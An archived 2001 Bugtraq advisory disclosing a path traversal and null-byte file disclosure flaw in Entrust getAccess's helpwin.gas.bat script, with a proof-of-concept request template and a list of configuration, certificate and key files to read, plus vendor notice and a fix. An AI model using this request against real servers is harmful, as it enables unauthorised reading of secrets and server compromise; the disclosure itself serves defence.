Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: New getAccess[tm] Vulnerability

New getAccess[tm] Vulnerability

From: rudi carell <rudicarell_at_hotmail.com>
Date: Mon, 05 Nov 2001 14:17:14

Good Morning Listmembers,

this is another posting(see 1st here http://www.securityfocus.com/bid/3109)
about Entrust s "getAccess[tm]" product

Problem Description:

"getAccess[tm]" (still) uses default shellscripts which start java-classes
for their web-applications.

due to missing input-validation it is possible to read files with getAccess
s permissions on the "getaccess"-machine. (only works in combination with
other input fields as described below)
in connection with config- and other files this can lead to a
total server-compromise(dont ask me how:-).

POC-Example:

a HTTP-request to:
http://getAccessHostname/sek-bin/helpwin.gas.bat?

with the following parameters:
mode=
&draw=x
&file=x
&module=
&locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]
&chapter=

... will lead to disclosure of [FILE/PATH]

Config-Filelist(depends heavily on config .. and can be found 2 trav s back
[../../]):

/config/acl-runtime.conf
/config/administration.conf
/config/applist.conf
/config/authmethod.conf
/config/clientCert.conf
/config/connection.conf
/config/directories.conf
/config/domainAuth.conf
/config/hook.conf
/config/license.conf
/config/log.conf
/config/login.conf
/config/misc.conf
/config/pmda.conf
/config/redirection.conf
/config/registry.conf
/config/serverCert.conf
/config/serverConnection.conf
/config/source_systems.conf
/config/version.conf
/config/serverReq.pem
/config/serverCert.pem
/config/certs

Summary:

object: (helpwin.gas.bat cgi-shell-scripts)

class: Reffering to OWASP-IV (Input Validation Classes)

Directory Traversal (IV-DT-1)
http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm
Null Character (IV-NC-1)
http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm
Meta Character (IV-MC-1)
http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm

remote: yes
local: ---

vendor: hast been informed with seperate e-mail
(security_at_entrust.com/entrust_at_entrust.com)

patch/fix: is already availiable and will be posted by entrust here today.

recomannded fix: sanitize meta-characters from user-input

personal remark: using shell-scripts for security-related software has
always been dangerous!!!

nice day,

rC

security_at_freefly.com
rudicarell_at_hotmail.com
http://www.freefly.com/security/

check out the brandnew Open Web Application Security project
http://www.owasp.org

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
Received on Nov 05 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]